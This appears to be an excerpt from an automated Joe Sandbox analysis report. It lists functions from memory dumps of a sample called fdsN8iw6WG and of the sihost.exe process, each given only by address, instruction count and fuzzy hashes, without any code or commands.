Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75aea5957c065e12d1b4fd6ce73864d552ecb104fa3166247bf67032ca616eb8
Instruction ID: 8a16e0d0a4aa61a02b6f78b7c982a594d4e715e0a6e200f9ea6719b52c216833
Opcode Fuzzy Hash: 75aea5957c065e12d1b4fd6ce73864d552ecb104fa3166247bf67032ca616eb8
Instruction Fuzzy Hash: E001FB3090899C8FCF98EF18D894FE8B7B0EB99315F1401A9D40DE7291DA35AAC1CB40

Function 00007FF849291ECA Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ba2b9fbebedafd84f0abc14849567fda91b3348dce82275e93238e8bdd84eb
Instruction ID: 87f147ecdd1745ffa52a1155f4d4fe0c3fc717c9a23aee8c82733115236c8b12
Opcode Fuzzy Hash: 66ba2b9fbebedafd84f0abc14849567fda91b3348dce82275e93238e8bdd84eb
Instruction Fuzzy Hash: 5101E83090899C8FDF98EF18C898BE8B7B0EBA8315F1401A9D40DE7291DA359A81CB40

Function 00007FF848E9476B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction ID: f9962deaae9f340db721c335dfc555082c20fd0d543196d6cc651b052682ee08
Opcode Fuzzy Hash: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction Fuzzy Hash: 31011D3090C51E8EEB64FA84D8517F872A1FB54359F5140BAD81ED3292EFB869C58A09

Function 00007FF84929BE32 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c1596fc8291046afa363c115b8917c43b969daffbeb9135164f40dbefbf5274
Instruction ID: 08b4427c90713e083eecf8cd6f5c1c2e20756d23670475d57f9d8e931dec62fb
Opcode Fuzzy Hash: 7c1596fc8291046afa363c115b8917c43b969daffbeb9135164f40dbefbf5274
Instruction Fuzzy Hash: 94F0C23184E3C59FE3539F7098655997FB8EF03254F1900FAD199CA0A2C66D1A46C762

Function 00007FF849296F72 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7e745cb988de5ae21e0cafe46559c9a780f7bb520516ea19a42742aa57b90b0
Instruction ID: f2f1d149a76fc4776b04009b7161092df50f43cdffdc92e288c659e447d16528
Opcode Fuzzy Hash: b7e745cb988de5ae21e0cafe46559c9a780f7bb520516ea19a42742aa57b90b0
Instruction Fuzzy Hash: 8AF0C23184E3C69FE312DF7088514A97FE0EF43248F1900FAD05ACB0A2C62D2A0AC761

Function 00007FF849291F42 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e83a6ef1bae85a06eb0a220ba0bc0a7844e6ad8fbc15deb280b0a21fdc82c8
Instruction ID: 564cd48eead469f770a42d3d66fc84e26179a22d2883171a7fbe50923674fb5f
Opcode Fuzzy Hash: 19e83a6ef1bae85a06eb0a220ba0bc0a7844e6ad8fbc15deb280b0a21fdc82c8
Instruction Fuzzy Hash: 67F0363144E3C9AFD313AB708C119A57FB8AF43254B1500E6E456CB0B3D63C665AC761

Function 00007FF848E90C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f442014669c82906bfac209749b498a5c53640c6fe2ffa08b5a1acb8a1da0de
Instruction ID: 6b9b96b18b208c54e380820dc968439b00a670acdaaf9ac3cce8601ef6903d0d
Opcode Fuzzy Hash: 7f442014669c82906bfac209749b498a5c53640c6fe2ffa08b5a1acb8a1da0de
Instruction Fuzzy Hash: D5014B7090D7899FE702EBA4888429DBFB0EF02318F5441E6D444DB296DA785A88C745

Function 00007FF84929D628 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd58329bc14638aad5721017d1cf739f4d82633fcb71d228183b9c8655c715f
Instruction ID: febe17a6cfc42cec04c0d6df637f4ff0e2e88a7ce703d2af68e482ae8d7a857c
Opcode Fuzzy Hash: 8bd58329bc14638aad5721017d1cf739f4d82633fcb71d228183b9c8655c715f
Instruction Fuzzy Hash: 99F08211B0E9E78FF6793E54A5122F96641BF513D8F64013AE42E825C7CE1D3543B291

Function 00007FF849298748 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce6113b3389f80a95a36ff1badb6d9b7e2cb55f67a67a3add9d3d9cb8b513ae
Instruction ID: 954403f3ca0a5ad6ddcb7d6c188f1500dd2601fe0d57dfb9e210f7583ac2bd08
Opcode Fuzzy Hash: 4ce6113b3389f80a95a36ff1badb6d9b7e2cb55f67a67a3add9d3d9cb8b513ae
Instruction Fuzzy Hash: 51F02715B0DAE7CFF775BD14A8112FD26C0AF113C8F68053AC92E822C6CF2D29419A53

Function 00007FF848E947F2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction ID: a8be5314a646d861bf2a4e9d35558c180715471d40fced91f4cf1a08e0e72cbc
Opcode Fuzzy Hash: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction Fuzzy Hash: 0FF0903090C40E4FEB64F68094116B87391FF45398F1041B5DC0DC3292FF786C514649

Function 00007FF848E90B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878db517928f9c7d8d45a20ec63b6da322b54de163718107b90b641c15354421
Instruction ID: e9e5cfb34d460c2852c28c84a03de3590371f2e43f547f037799138455033ffa
Opcode Fuzzy Hash: 878db517928f9c7d8d45a20ec63b6da322b54de163718107b90b641c15354421
Instruction Fuzzy Hash: C9F0A03425DA85CFC742EB3C88A58E4BF60FF03204BDA11F9D089CB5A2D325585EC782

Function 00007FF848E95035 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction ID: 98b3d2f2f32cc28d9f4463b06157e465e3a45785f3262158d060a49439862629
Opcode Fuzzy Hash: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction Fuzzy Hash: 43E01A21E0C11A4EF7A4FA94C8503BD62A1FF85348F5040B4D81EE36D2CF7C6D81874A

Function 00007FF848E93FE3 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bb4d6c823c359f0ef42fbea1164a8133265d53fe4516873abd14e658a167ab
Instruction ID: dd31b7a4c5d45b0b259e400d435f6b3f82a40657789cf35c01fe823b57f4fa71
Opcode Fuzzy Hash: 08bb4d6c823c359f0ef42fbea1164a8133265d53fe4516873abd14e658a167ab
Instruction Fuzzy Hash: D8E01211E2C5964EF29CB5BC44223B450C1BB84745F484079D40EC32C3DEAD1C440296

Function 00007FF849292C37 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be4daab084f44036ea0b01337b962d53e10898397566339d1c1351b7921b5b84
Instruction ID: b73cd438ff703f34919bff6fc418c8040ca66ad135102052f4f972be4e6c8dd6
Opcode Fuzzy Hash: be4daab084f44036ea0b01337b962d53e10898397566339d1c1351b7921b5b84
Instruction Fuzzy Hash: C7D0C211E0C3D29FFB3A6A7008D00383EA0AF0B38471501B2C1294A1C3DA5828054721

Function 00007FF84929CB2D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb02bb76af9a8fb0774a1e0a3c21c95b14264c304ef879834f16ebb2d7a032d
Instruction ID: c59a445278b9b26aed782a4a9b1aa4f572f2d879858ab18a86a66bc7037c164c
Opcode Fuzzy Hash: 8bb02bb76af9a8fb0774a1e0a3c21c95b14264c304ef879834f16ebb2d7a032d
Instruction Fuzzy Hash: 8DD05E91F1D3E38FFB39A96448E503C2F90AF173C8B550171C12E862D3EA582804876B

Function 00007FF848E906AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction ID: 1198c48262db1e91eb1daaa98c973925eeeb318cb25aab14d37827c844045de8
Opcode Fuzzy Hash: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction Fuzzy Hash: 48C08C02D0F52F08E440B1EE24020ACA1007FC46ACFD00032C50C400829FED20D5024E

Function 00007FF848E91310 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction ID: a5e26dc72f763d39f5ad9a43c9935a13367498f5068a8296a12beb2e53d26c58
Opcode Fuzzy Hash: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction Fuzzy Hash: F0C08C304148088FC908FB29C88880433A0FF49209BC10090E009C7170E269DCC1C740

Function 00007FF84929371B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9659b9ce1baeeb7c2ccb19f5e1c30ed9cfca97b1fdf91616fdd0e694ce3572c
Instruction ID: e4bf4b8427f943f84adfadf81a07518234aa77aaf69604a14f99b0a8aabb25eb
Opcode Fuzzy Hash: a9659b9ce1baeeb7c2ccb19f5e1c30ed9cfca97b1fdf91616fdd0e694ce3572c
Instruction Fuzzy Hash: 6ED09294B0D5F79DF5787A15516037B51955F01789F200439C1AF418E1DA1DB9016602

Function 00007FF849297C7A Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa5bba4698c8f76465c7bca8309c4c2c66887604f08b8c469135f811e1662fa6
Instruction ID: 608419304b54449bbb116130e1b4c37f0f1f09b82a4da82908dd05c216dbe5e1
Opcode Fuzzy Hash: aa5bba4698c8f76465c7bca8309c4c2c66887604f08b8c469135f811e1662fa6
Instruction Fuzzy Hash: 7DC08C20F0C3839FF2216AB0988003C36606F4A389B500976C6268A0D3DE283C005B64

Function 00007FF848E906D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291087232.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction ID: e44843ce6a326973f2a5a53be4314f63db26b123ca27d7ea41c8f377983cf981
Opcode Fuzzy Hash: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction Fuzzy Hash: 79B01200C5E41F04E404B1FA08420A870407FC4148FC00070D80C4008199DD1094034A

Function 00007FF849292E3A Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2295672135.00007FF849290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849290000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a793df89ee6f598583b0fa6eeb9c4bb8723eaf8cc75e66dcc01cd812eafd622
Instruction ID: 4697ad853775d51de98b8600cf1426f2bcf2772335d66dbd84d5520218fab5e4
Opcode Fuzzy Hash: 7a793df89ee6f598583b0fa6eeb9c4bb8723eaf8cc75e66dcc01cd812eafd622
Instruction Fuzzy Hash: FAA00240F0C8AA5DF5757514050117D50423F84684F314431E21D8118ACF2C6602168E

Analysis Process: sihost.exePID: 1672, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848E60D70 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 191d5d600f22f4e700cf9a871ac842e64adf68b5a0810dd4b9dabebb83f0f0cd
Instruction ID: 92377a8c8085d6007d544abe6c292110f8d0d547bfb305c818ddfea5e0390a93
Opcode Fuzzy Hash: 191d5d600f22f4e700cf9a871ac842e64adf68b5a0810dd4b9dabebb83f0f0cd
Instruction Fuzzy Hash: 5F91C175D1CA998FE789EB28D8693AA7FE0FF96350F4400BAC049E72D2DB781815C711

Function 00007FF848E60B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FF848E60B56
!k9, xrefs: 00007FF848E60B4E
"s9, xrefs: 00007FF848E60B46

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 31d0b06b4d1969b856a058ac3edd199d739a0cd5d76fe7e3691b118520364b0c
Instruction ID: 5d5258ba7701fd2bc5c57b48a8010d4227e8934212b8484c97507578413e1ce6
Opcode Fuzzy Hash: 31d0b06b4d1969b856a058ac3edd199d739a0cd5d76fe7e3691b118520364b0c
Instruction Fuzzy Hash: 2C01F72A32D9568FC602B63EA4505D87B50EAC2135BC901F7D144CB191E3105C9EC3E0

Function 00007FF848E60908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction ID: ae9473942b9f4cd99d7bab87696a697ebdd573ff0ba58788f745b26d878f8d46
Opcode Fuzzy Hash: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction Fuzzy Hash: 0B21D83170CC184FD768EA1CE889DB973D1FB9932170501BAE58AC7126D921EC8287C5

Function 00007FF848E6472C Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1efd2528d02ee32652b2bdd72d0fb1b7ab4c31dee9d705dd4b398b5938d65e9
Instruction ID: 6c67a0f0cab8b733eee3973299b77352ee58d50c67870521ed4c191aa22857dd
Opcode Fuzzy Hash: f1efd2528d02ee32652b2bdd72d0fb1b7ab4c31dee9d705dd4b398b5938d65e9
Instruction Fuzzy Hash: 91315E20D1C51A4EEBA4F65894567B872D1FF59394F9001BAE80EF3292EF3878844A4A

Function 00007FF848E60998 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be339d9c366d9d9e8c9bce7937539e7389afe578cfbd5384b2519cf806032de5
Instruction ID: 10a27c69ef57210826baab7cb7fbc168222fde796548a89561c6f9004f55a4f4
Opcode Fuzzy Hash: be339d9c366d9d9e8c9bce7937539e7389afe578cfbd5384b2519cf806032de5
Instruction Fuzzy Hash: 4D212B20B1CD191FE788B72CA45927977C2FF993A1F5400BAE80EC32D7DE24AC818284

Function 00007FF848E611A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd9f3055c1fd5680a1fa3fe2fd766b1ed6b5ac26fbf5bfefd31b69069a9a7f3
Instruction ID: 65026917c67fd2d78219b80a7e59da90a7bf659cec40affbc58f8656ac640483
Opcode Fuzzy Hash: cfd9f3055c1fd5680a1fa3fe2fd766b1ed6b5ac26fbf5bfefd31b69069a9a7f3
Instruction Fuzzy Hash: 6A314F3190D69A8FDB46EB68C8589B97BF0FF56340F4405BAD009E72A2DB39A940C751

Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22583f207ccc5b02745abf53af95b7a89493d426644691fc3d57b1a4db1bdef9
Instruction ID: c42dada1780c21b18813ea4db72aeb3ced50a3d6a208e7cdce2ca99dd0bbbcf3
Opcode Fuzzy Hash: 22583f207ccc5b02745abf53af95b7a89493d426644691fc3d57b1a4db1bdef9
Instruction Fuzzy Hash: F521D17590D69AAFE712FB28C8452EC7FA0FF423A0F5445BAC044FB1C2DB3829898755

Function 00007FF848E608F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction ID: ad54f8b196b71538dcd1682855679afe4567056aebd3c88d2da7cf4811f98e8f
Opcode Fuzzy Hash: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction Fuzzy Hash: 4C014C31B0D92C1FD658E01D540A93573C2E7CA6B0B951239D84FD3245CD61FC0342C4

Function 00007FF848E62398 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a5fe811a3972dd36e8996f6382f25fe6156d10dd2a1c2af179fd8b1bd35a1b
Instruction ID: 3d0175eeca47bc9c9864a510ac2f41fa029765958437b399eddb13d307040adf
Opcode Fuzzy Hash: 73a5fe811a3972dd36e8996f6382f25fe6156d10dd2a1c2af179fd8b1bd35a1b
Instruction Fuzzy Hash: 8611FA3094891ACFDB68EB08C894BA973E1FB68311F0001B9C40EE7691DB35AD80DB85

Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2e3b7ec81ad27648dd1297d8726867d428adf5c2345ab7514c8d668a9f13af
Instruction ID: 62eed9485e9813d401ae7f9eeec9734b840154183bb1d33ebe6db783b8a1e53e
Opcode Fuzzy Hash: 2b2e3b7ec81ad27648dd1297d8726867d428adf5c2345ab7514c8d668a9f13af
Instruction Fuzzy Hash: 15018C3590D6999FE702FB28C8442DDBFB0EF42360F5545B6C044EB292DA386A898B84

Function 00007FF848E6476B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction ID: 1189e2bda51583aac6c466c94dad6d19439c7eafe551c0d37d4086c159965ddc
Opcode Fuzzy Hash: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction Fuzzy Hash: 8E011D3090C41E8EEB64FA44D8517F872A1FB54365F5040BAD81EF3192EF3879D58A09

Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e89e45e757d0538b9e22a3a296b692ec20fb8e040182c046c51f5add90598aee
Instruction ID: b2b8875c47ca063fac3825a2a1ea0182adbecd3caf3257abdc8497e043532d6c
Opcode Fuzzy Hash: e89e45e757d0538b9e22a3a296b692ec20fb8e040182c046c51f5add90598aee
Instruction Fuzzy Hash: 67014B7090D7899FE702EB6488846DDBFF0EF02314F5441E6D444EB292DA386A488745

Function 00007FF848E647F2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction ID: 135c536dd038cbb2ad82e04fc3629bc8d2b21beb8eec37928fb60e16fcf516a6
Opcode Fuzzy Hash: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction Fuzzy Hash: E6F0543090C41A8EEA64F604D4556B87391FF553A4F9041B6DC4DF31A2FF387D954649

Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849ce57074af94ef2dfc2bd30472d2e0e6621d792c6fec3cd77b958c2a59e3f2
Instruction ID: c12b1b538196bb15c1c96a5b55d8ae4b42bef9ab84d9841ff58b916f105e1972
Opcode Fuzzy Hash: 849ce57074af94ef2dfc2bd30472d2e0e6621d792c6fec3cd77b958c2a59e3f2
Instruction Fuzzy Hash: 8BF08C3925DA85CFD742EA3D88A58D4BF60EB02104BDA01FAD089CB5A2D3255C5EC741

Function 00007FF848E65035 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2383844740.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction ID: 7c5ec15222349d61f3e17f28a74a6160dd8ba60e9cb9b202d977dbb37d3a6829
Opcode Fuzzy Hash: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction Fuzzy Hash: 44E01A20E0C12A8EF7A4FA14C8553BD62A1FF85390F9440B4D81EB32E2CE387D85870A

